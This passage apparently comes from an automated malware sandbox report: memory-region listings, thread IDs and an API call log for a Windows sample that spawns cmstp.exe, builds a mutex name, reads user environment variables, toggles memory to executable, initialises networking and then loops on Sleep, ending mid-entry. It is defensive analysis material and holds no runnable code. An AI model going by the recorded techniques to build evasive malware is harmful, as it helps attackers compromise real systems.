start_va = 0x7fefdb30000 end_va = 0x7fefdbf8fff monitored = 0 entry_point = 0x7fefdbaa874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1887 start_va = 0x7fefdc00000 end_va = 0x7fefdc0dfff monitored = 0 entry_point = 0x7fefdc01080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1888 start_va = 0x7fefdc10000 end_va = 0x7fefdc17fff monitored = 0 entry_point = 0x7fefdc11504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1889 start_va = 0x7fefdc20000 end_va = 0x7fefdc90fff monitored = 0 entry_point = 0x7fefdc31e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1890 start_va = 0x7fefdca0000 end_va = 0x7fefdd06fff monitored = 0 entry_point = 0x7fefdcab03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1891 start_va = 0x7fefdd10000 end_va = 0x7fefdd5cfff monitored = 0 entry_point = 0x7fefdd11070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1892 start_va = 0x7fefdd60000 end_va = 0x7fefdd7efff monitored = 0 entry_point = 0x7fefdd660e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1893 start_va = 0x7fefdd80000 end_va = 0x7fefdf82fff monitored = 0 entry_point = 0x7fefdda3330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1894 start_va = 0x7fefdf90000 end_va = 0x7fefdfe1fff monitored = 0 entry_point = 0x7fefdf910d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1895 start_va = 0x7fefdff0000 end_va = 0x7fefe01dfff monitored = 0 entry_point = 0x7fefdff1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1896 start_va = 0x7fefe020000 end_va = 0x7fefe0fafff monitored = 0 entry_point = 0x7fefe040760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1897 start_va = 0x7fefe100000 end_va = 0x7fefe277fff monitored = 0 entry_point = 0x7fefe1010e0 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1898 start_va = 0x7fefe280000 end_va = 0x7fefe456fff monitored = 0 entry_point = 0x7fefe281010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1899 start_va = 0x7fefe4e0000 end_va = 0x7fefe5e8fff monitored = 0 entry_point = 0x7fefe4e1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1900 start_va = 0x7fefe5f0000 end_va = 0x7fefe848fff monitored = 0 entry_point = 0x7fefe5f1340 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1901 start_va = 0x7fefe850000 end_va = 0x7fefe8e8fff monitored = 0 entry_point = 0x7fefe851c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1902 start_va = 0x7fefe8f0000 end_va = 0x7fefe9c6fff monitored = 0 entry_point = 0x7fefe8f3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1903 start_va = 0x7fefea70000 end_va = 0x7feff7f7fff monitored = 0 entry_point = 0x7fefeaecebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1904 start_va = 0x7feff800000 end_va = 0x7feff929fff monitored = 0 entry_point = 0x7feff8010d4 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1905 start_va = 0x7feff930000 end_va = 0x7feff9cefff monitored = 0 entry_point = 0x7feff9325a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1906 start_va = 0x7feff9d0000 end_va = 0x7feff9e6fff monitored = 0 entry_point = 0x7feff9d1070 region_type = mapped_file name = "imagehlp.dll" filename = "\\Windows\\System32\\imagehlp.dll" (normalized: "c:\\windows\\system32\\imagehlp.dll") Region: id = 1907 start_va = 0x7feffa00000 end_va = 0x7feffa00fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1908 start_va = 0x7fffff7a000 end_va = 0x7fffff7bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7a000" filename = "" Region: id = 1909 start_va = 0x7fffff7c000 end_va = 0x7fffff7dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff7c000" filename = "" Region: id = 1910 start_va = 0x7fffff80000 end_va = 0x7fffff81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff80000" filename = "" Region: id = 1911 start_va = 0x7fffff82000 end_va = 0x7fffff83fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff82000" filename = "" Region: id = 1912 start_va = 0x7fffff84000 end_va = 0x7fffff85fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff84000" filename = "" Region: id = 1913 start_va = 0x7fffff86000 end_va = 0x7fffff87fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff86000" filename = "" Region: id = 1914 start_va = 0x7fffff88000 end_va = 0x7fffff89fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff88000" filename = "" Region: id = 1915 start_va = 0x7fffff8a000 end_va = 0x7fffff8bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8a000" filename = "" Region: id = 1916 start_va = 0x7fffff8c000 end_va = 0x7fffff8dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8c000" filename = "" Region: id = 1917 start_va = 0x7fffff8e000 end_va = 0x7fffff8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff8e000" filename = "" Region: id = 1918 start_va = 0x7fffff90000 end_va = 0x7fffff91fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff90000" filename = "" Region: id = 1919 start_va = 0x7fffff92000 end_va = 0x7fffff93fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff92000" filename = "" Region: id = 1920 start_va = 0x7fffff94000 end_va = 0x7fffff95fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 1921 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 1922 start_va = 0x7fffff98000 end_va = 0x7fffff99fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 1923 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 1924 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 1925 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 1926 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 1927 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1928 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1929 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1930 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1931 start_va = 0x7fffffac000 end_va = 0x7fffffadfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1932 start_va = 0x7fffffae000 end_va = 0x7fffffaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 1933 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1934 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1935 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1936 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 1937 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 1938 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 1939 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 1940 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 2143 start_va = 0x8cc0000 end_va = 0x9683fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008cc0000" filename = "" Region: id = 2162 start_va = 0x2520000 end_va = 0x25fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002520000" filename = "" Region: id = 4119 start_va = 0x2400000 end_va = 0x2402fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 4120 start_va = 0x2670000 end_va = 0x26effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002670000" filename = "" Region: id = 4121 start_va = 0x7fefcec0000 end_va = 0x7fefcf14fff monitored = 0 entry_point = 0x7fefcec1054 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4122 start_va = 0x7fffff96000 end_va = 0x7fffff97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 4123 start_va = 0x5de0000 end_va = 0x5ecffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005de0000" filename = "" Region: id = 4124 start_va = 0x7fefc8c0000 end_va = 0x7fefc8c6fff monitored = 0 entry_point = 0x7fefc8c14b0 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4125 start_va = 0x7fefcd40000 end_va = 0x7fefcd9afff monitored = 0 entry_point = 0x7fefcd46940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4126 start_va = 0x68f0000 end_va = 0x6aaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000068f0000" filename = "" Region: id = 4128 start_va = 0x7fef4d10000 end_va = 0x7fef4d17fff monitored = 0 entry_point = 0x7fef4d11414 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4202 start_va = 0x7fefaee0000 end_va = 0x7fefaf32fff monitored = 0 entry_point = 0x7fefaee2b98 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4203 start_va = 0x6ab0000 end_va = 0x6cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006ab0000" filename = "" Region: id = 4204 start_va = 0x7fefceb0000 end_va = 0x7fefceb6fff monitored = 0 entry_point = 0x7fefceb142c region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4426 start_va = 0x2400000 end_va = 0x2405fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "timedate.cpl.mui" filename = "\\Windows\\System32\\en-US\\timedate.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\timedate.cpl.mui") Region: id = 4427 start_va = 0x2610000 end_va = 0x2617fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012021092820210929\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\mshist012021092820210929\\index.dat") Region: id = 4428 start_va = 0x2620000 end_va = 0x2653fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 4429 start_va = 0x29a0000 end_va = 0x2a1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000029a0000" filename = "" Region: id = 4430 start_va = 0x38a0000 end_va = 0x391ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000038a0000" filename = "" Region: id = 4431 start_va = 0x41c0000 end_va = 0x423ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000041c0000" filename = "" Region: id = 4432 start_va = 0x5d80000 end_va = 0x5dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005d80000" filename = "" Region: id = 4433 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 4434 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 4435 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 4581 start_va = 0x7fef1c10000 end_va = 0x7fef1dbffff monitored = 0 entry_point = 0x7fef1c11020 region_type = mapped_file name = "comsvcs.dll" filename = "\\Windows\\System32\\comsvcs.dll" (normalized: "c:\\windows\\system32\\comsvcs.dll") Region: id = 4583 start_va = 0x2600000 end_va = 0x2600fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002600000" filename = "" Region: id = 4636 start_va = 0x7fef0980000 end_va = 0x7fef0987fff monitored = 0 entry_point = 0x7fef09811a0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 4637 start_va = 0x4240000 end_va = 0x4307fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 4638 start_va = 0x4240000 end_va = 0x4307fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 4639 start_va = 0x2660000 end_va = 0x2660fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "basebrd.dll.mui" filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui") Region: id = 4640 start_va = 0x26f0000 end_va = 0x2708fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 4732 start_va = 0x2660000 end_va = 0x2662fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 4733 start_va = 0x26f0000 end_va = 0x270ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000026f0000" filename = "" Region: id = 4734 start_va = 0x5cc0000 end_va = 0x5d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005cc0000" filename = "" Region: id = 4735 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4736 start_va = 0x2710000 end_va = 0x2713fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 4737 start_va = 0x2850000 end_va = 0x2853fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 4738 start_va = 0x37b0000 end_va = 0x37c9fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000008.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000008.db") Region: id = 4740 start_va = 0x26f0000 end_va = 0x26f4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Thread: id = 97 os_tid = 0xeb4 Thread: id = 98 os_tid = 0xcb8 Thread: id = 99 os_tid = 0xcac Thread: id = 100 os_tid = 0xca0 Thread: id = 101 os_tid = 0x878 Thread: id = 102 os_tid = 0x854 Thread: id = 103 os_tid = 0x3b8 Thread: id = 104 os_tid = 0x2a4 Thread: id = 105 os_tid = 0x224 Thread: id = 106 os_tid = 0x448 Thread: id = 107 os_tid = 0x5b0 Thread: id = 108 os_tid = 0x5a0 Thread: id = 109 os_tid = 0x7c8 Thread: id = 110 os_tid = 0x5a4 Thread: id = 111 os_tid = 0x354 Thread: id = 112 os_tid = 0x350 Thread: id = 113 os_tid = 0x53c Thread: id = 114 os_tid = 0x51c Thread: id = 115 os_tid = 0x514 Thread: id = 116 os_tid = 0x510 Thread: id = 117 os_tid = 0x478 Thread: id = 118 os_tid = 0x5d8 Thread: id = 119 os_tid = 0x55c Thread: id = 120 os_tid = 0x540 Thread: id = 121 os_tid = 0x534 Thread: id = 122 os_tid = 0x52c Thread: id = 123 os_tid = 0x518 Thread: id = 124 os_tid = 0x50c Thread: id = 125 os_tid = 0x4f0 Thread: id = 126 os_tid = 0x4d4 Thread: id = 127 os_tid = 0x4cc Thread: id = 128 os_tid = 0x4bc Thread: id = 129 os_tid = 0x4b8 Thread: id = 130 os_tid = 0x474 Thread: id = 131 os_tid = 0x460 [0124.164] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Windows\\SysWOW64\\cmstp.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x800000c, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12f478*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12f450, hNewToken=0x0 | out: lpProcessInformation=0x12f450*(hProcess=0xab4, hThread=0xaec, dwProcessId=0xed8, dwThreadId=0xedc), hNewToken=0x0) returned 1 [0144.774] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x12f0e0 | out: HeapArray=0x12f0e0*=0x300000) returned 0xe [0144.780] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x3da0) returned 0x6f0b030 [0144.795] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x12eec0 | out: Value="kEecfMwgj") returned 0x0 [0144.824] RtlIntegerToChar (in: Value=0x45c, Base=0x0, Length=0x20, String=0x12f4a0 | out: String="1116") returned 0x0 [0144.824] RtlIntegerToChar (in: Value=0x665eb539, Base=0x0, Length=0x20, String=0x12f4a0 | out: String="1717482809") returned 0x0 [0144.824] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="S-1-5-21-4219442-11161717482809") returned 0x3cc [0144.824] GetLastError () returned 0x0 [0144.910] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0x12ec50 | out: Value="kEecfMwgj") returned 0x0 [0144.920] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0x12ef50 | out: Value="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0144.946] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x12f108*=0x775f6110, NumberOfBytesToProtect=0x12f100, NewAccessProtection=0x40, OldAccessProtection=0x12f250 | out: BaseAddress=0x12f108*=0x775f6000, NumberOfBytesToProtect=0x12f100, OldAccessProtection=0x12f250*=0x20) returned 0x0 [0144.962] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x12f108*=0x775f6110, NumberOfBytesToProtect=0x12f100, NewAccessProtection=0x20, OldAccessProtection=0x12f250 | out: BaseAddress=0x12f108*=0x775f6000, NumberOfBytesToProtect=0x12f100, OldAccessProtection=0x12f250*=0x40) returned 0x0 [0145.029] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x12f108*=0x775f9e74, NumberOfBytesToProtect=0x12f100, NewAccessProtection=0x40, OldAccessProtection=0x12f250 | out: BaseAddress=0x12f108*=0x775f9000, NumberOfBytesToProtect=0x12f100, OldAccessProtection=0x12f250*=0x20) returned 0x0 [0145.039] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x12f108*=0x775f9e74, NumberOfBytesToProtect=0x12f100, NewAccessProtection=0x20, OldAccessProtection=0x12f250 | out: BaseAddress=0x12f108*=0x775f9000, NumberOfBytesToProtect=0x12f100, OldAccessProtection=0x12f250*=0x40) returned 0x0 [0145.064] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x12f108*=0x775f3a18, NumberOfBytesToProtect=0x12f100, NewAccessProtection=0x40, OldAccessProtection=0x12f250 | out: BaseAddress=0x12f108*=0x775f3000, NumberOfBytesToProtect=0x12f100, OldAccessProtection=0x12f250*=0x20) returned 0x0 [0145.075] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x12f108*=0x775f3a18, NumberOfBytesToProtect=0x12f100, NewAccessProtection=0x20, OldAccessProtection=0x12f250 | out: BaseAddress=0x12f108*=0x775f3000, NumberOfBytesToProtect=0x12f100, OldAccessProtection=0x12f250*=0x40) returned 0x0 [0145.109] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x12f108*=0x775f8fd0, NumberOfBytesToProtect=0x12f100, NewAccessProtection=0x40, OldAccessProtection=0x12f250 | out: BaseAddress=0x12f108*=0x775f8000, NumberOfBytesToProtect=0x12f100, OldAccessProtection=0x12f250*=0x20) returned 0x0 [0145.124] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x12f108*=0x775f8fd0, NumberOfBytesToProtect=0x12f100, NewAccessProtection=0x20, OldAccessProtection=0x12f250 | out: BaseAddress=0x12f108*=0x775f8000, NumberOfBytesToProtect=0x12f100, OldAccessProtection=0x12f250*=0x40) returned 0x0 [0145.410] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0x12eeee, cbSize=0x12eec0 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", cbSize=0x12eec0) returned 0x0 [0148.282] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x12f2c0 | out: lpWSAData=0x12f2c0) returned 0 [0148.291] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x257aca5, lpParameter=0x257ff26, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1324 Thread: id = 154 os_tid = 0xf28 [0148.325] Sleep (dwMilliseconds=0x7d0) [0150.325] Sleep (dwMilliseconds=0x7d0) [0152.337] Sleep (dwMilliseconds=0x7d0) [0154.431] Sleep (dwMilliseconds=0x7d0) [0156.441] Sleep (dwMilliseconds=0x7d0) [0158.456] Sleep (dwMilliseconds=0x7d0) [0160.474] Sleep (dwMilliseconds=0x7d0) [0162.556] Sleep (dwMilliseconds=0x7d0) [0164.591] Sleep (dwMilliseconds=0x7d0) [0166.643] Sleep (dwMilliseconds=0x7d0) [0168.655] Sleep (dwMilliseconds=0x7d0) [0168.671] Sleep (dwMilliseconds=0x7d0) [0168.686] Sleep (dwMilliseconds=0x7d0) [0168.702] Sleep (dwMilliseconds=0x7d0) [0168.717] Sleep (dwMilliseconds=0x7d0) [0168.734] Sleep (dwMilliseconds=0x7d0) [0168.749] Sleep (dwMilliseconds=0x7d0) [0168.774] Sleep (dwMilliseconds=0x7d0) [0168.780] Sleep (dwMilliseconds=0x7d0) [0168.795] Sleep (dwMilliseconds=0x7d0) [0168.811] Sleep (dwMilliseconds=0x7d0) [0168.827] Sleep (dwMilliseconds=0x7d0) [0168.862] Sleep (dwMilliseconds=0x7d0) [0168.873] Sleep (dwMilliseconds=0x7d0) [0168.889] Sleep (dwMilliseconds=0x7d0) [0168.905] Sleep (dwMilliseconds=0x7d0) [0168.920] Sleep (dwMilliseconds=0x7d0) [0168.950] Sleep (dwMilliseconds=0x7d0) [0168.951] Sleep (dwMilliseconds=0x7d0) [0168.968] Sleep (dwMilliseconds=0x7d0) [0168.983] Sleep (dwMilliseconds=0x7d0) [0168.998] Sleep (dwMilliseconds=0x7d0) [0169.014] Sleep (dwMilliseconds=0x7d0) [0169.029] Sleep (dwMilliseconds=0x7d0) [0169.045] Sleep (dwMilliseconds=0x7d0) [0169.061] Sleep (dwMilliseconds=0x7d0) [0169.077] Sleep (dwMilliseconds=0x7d0) [0169.092] Sleep (dwMilliseconds=0x7d0) [0169.107] Sleep (dwMilliseconds=0x7d0) [0169.123] Sleep (dwMilliseconds=0x7d0) [0169.139] Sleep (dwMilliseconds=0x7d0) [0169.154] Sleep (dwMilliseconds=0x7d0) [0169.170] Sleep (dwMilliseconds=0x7d0) [0169.187] Sleep (dwMilliseconds=0x7d0) [0169.201] Sleep (dwMilliseconds=0x7d0) [0169.217] Sleep (dwMilliseconds=0x7d0) [0169.232] Sleep (dwMilliseconds=0x7d0) [0169.248] Sleep (dwMilliseconds=0x7d0) [0169.310] Sleep (dwMilliseconds=0x7d0) [0169.335] Sleep (dwMilliseconds=0x7d0) [0169.341] Sleep (dwMilliseconds=0x7d0) [0169.357] Sleep (dwMilliseconds=0x7d0) [0169.373] Sleep (dwMilliseconds=0x7d0) [0169.388] Sleep (dwMilliseconds=0x7d0) [0169.408] Sleep (dwMilliseconds=0x7d0) [0169.419] Sleep (dwMilliseconds=0x7d0) [0169.435] Sleep (dwMilliseconds=0x7d0) [0169.451] Sleep (dwMilliseconds=0x7d0) [0169.466] Sleep (dwMilliseconds=0x7d0) [0169.482] Sleep (dwMilliseconds=0x7d0) [0169.497] Sleep 